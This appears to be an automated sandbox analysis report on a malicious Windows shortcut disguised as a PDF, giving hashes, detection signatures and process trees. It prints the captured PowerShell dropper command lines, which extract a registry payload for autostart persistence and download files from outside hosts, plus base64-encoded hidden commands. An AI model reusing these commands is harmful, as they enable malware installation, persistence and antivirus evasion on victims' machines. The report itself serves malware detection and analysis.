Edit tour
Windows
Analysis Report
Document.pdf.lnk
Overview
General Information
| Sample name: | Document.pdf.lnk |
| Analysis ID: | 1385501 |
| MD5: | 1cdf8cedd29b81b611e4dd2bbf3b5e08 |
| SHA1: | 79ae856226052b05ec389b2db7cdfd429418f760 |
| SHA256: | abd4dcb78a92e4f98b88199ce08f88a3ce99032390747de6f3222f8d4a71939d |
| Tags: | lnk |
| Infos: |  |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious encrypted Powershell command line found
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Potential dropper URLs found in powershell memory
Powershell creates an autostart link
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses regedit.exe to modify the Windows registry
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
powershell.exe (PID: 5856 cmdline: C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" -c "& {$current Path = (Ge t-Location ).Path; St art-Proces s powershe ll -Window Style Hidd en -Verb R unAs -Argu mentList ( '-Command Set-Locati on -Path ' '\"' + $cu rrentPath + '\"'' ;$ dirPath = Get-Locati on;Set-Loc ation -Pat h ''\"' + $dirPath.P ath + '\"' ' ;$lnkpat hs = Get-C hildItem - Path ''\"' + $dirPat h.Path + ' \"'' -Recu rse *.lnk | Where-Ob ject { $_. length -eq 423781 } | Select-O bject -Exp andPropert y FullName ;$lnkpath = if ($lnk paths -is [array]) { $lnkpaths[ 0]} else { $lnkpaths} ;$exeFile = Get-Cont ent $lnkpa th -Encodi ng Byte -T otalCount 423781 -Re adCount 42 3781;$exeP ath = Join -Path $env :public '' 17399.reg' ';Set-Cont ent $exePa th ([byte[ ]]($exeFil e | Select -Object -S kip 4901)) -Encoding Byte;Star t-Process -FilePath ''regedit' ' -Argumen tList ''/s '', $exePa th;$a=''ht tp://files .catbox.mo e/p1yr9i.p df'';$d=$e nv:TEMP + ''\Documen t.pdf'';In voke-WebRe quest -Uri $a -OutFi le $d; Inv oke-Item $ d')} MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 4412 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1196 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command S et-Locatio n -Path '" C:\Users\u ser\Deskto p"' ;$dirP ath = Get- Location;S et-Locatio n -Path '" "' ;$lnkpa ths = Get- ChildItem -Path '""' -Recurse *.lnk | Wh ere-Object { $_.leng th -eq 423 781 } | Se lect-Objec t -ExpandP roperty Fu llName;$ln kpath = if ($lnkpath s -is [arr ay]) {$lnk paths[0]} else {$lnk paths};$ex eFile = Ge t-Content $lnkpath - Encoding B yte -Total Count 4237 81 -ReadCo unt 423781 ;$exePath = Join-Pat h $env:pub lic '17399 .reg';Set- Content $e xePath ([b yte[]]($ex eFile | Se lect-Objec t -Skip 49 01)) -Enco ding Byte; Start-Proc ess -FileP ath 'reged it' -Argum entList '/ s', $exePa th;$a='htt p://files. catbox.moe /p1yr9i.pd f';$d=$env :TEMP + '\ Document.p df';Invoke -WebReques t -Uri $a -OutFile $ d; Invoke- Item $d MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
regedit.exe (PID: 7288 cmdline: "C:\Window s\regedit. exe" /s C: \Users\Pub lic\17399. reg MD5: 999A30979F6195BF562068639FFC4426) 
Acrobat.exe (PID: 7360 cmdline: C:\Program Files\Ado be\Acrobat DC\Acroba t\Acrobat. exe" "C:\U sers\user\ AppData\Lo cal\Temp\D ocument.pd f MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 7552 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7800 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 84 --field -trial-han dle=1720,i ,671776223 23241092,9 0808477829 9603848,13 1072 --dis able-featu res=BackFo rwardCache ,Calculate NativeWinO cclusion,W inUseBrows erSpellChe cker /pref etch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
svchost.exe (PID: 7624 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 8156 cmdline:
"C:\Window s\system32 \WindowsPo werShell\v 1.0\PowerS hell.exe" -W Hidden -e JABjAHU AcgByAGUAb gB0AEQAcgB pAHYAZQAgA D0AIAAoAEc AZQB0AC0AT ABvAGMAYQB 0AGkAbwBuA CAAfAAgAFM AcABsAGkAd AAtAFAAYQB 0AGgAIAAtA FEAdQBhAGw AaQBmAGkAZ QByACkAOwA gAEEAZABkA C0ATQBwAFA AcgBlAGYAZ QByAGUAbgB jAGUAIAAtA EUAeABjAGw AdQBzAGkAb wBuAFAAYQB 0AGgAIAA MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5260 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6012 cmdline:
"C:\Window s\system32 \WindowsPo werShell\v 1.0\PowerS hell.exe" -W Hidden -e JABhAD0 AJwBoAHQAd ABwADoALwA vAHIAYQB3A C4AZwBpAHQ AaAB1AGIAd QBzAGUAcgB jAG8AbgB0A GUAbgB0AC4 AYwBvAG0AL wBNAHkAUAB yAGkAbgBjA GUAcwBzAEE AawBpAHIAY QAvAEoAYQB yAHYAYQBzA C8AbQBhAGk AbgAvAEEAb ABlAGoALgB lAHgAZQAnA DsAJABkAD0 AIgAkACgAJ ABlAG4AdgA 6AFQARQB MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5144 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||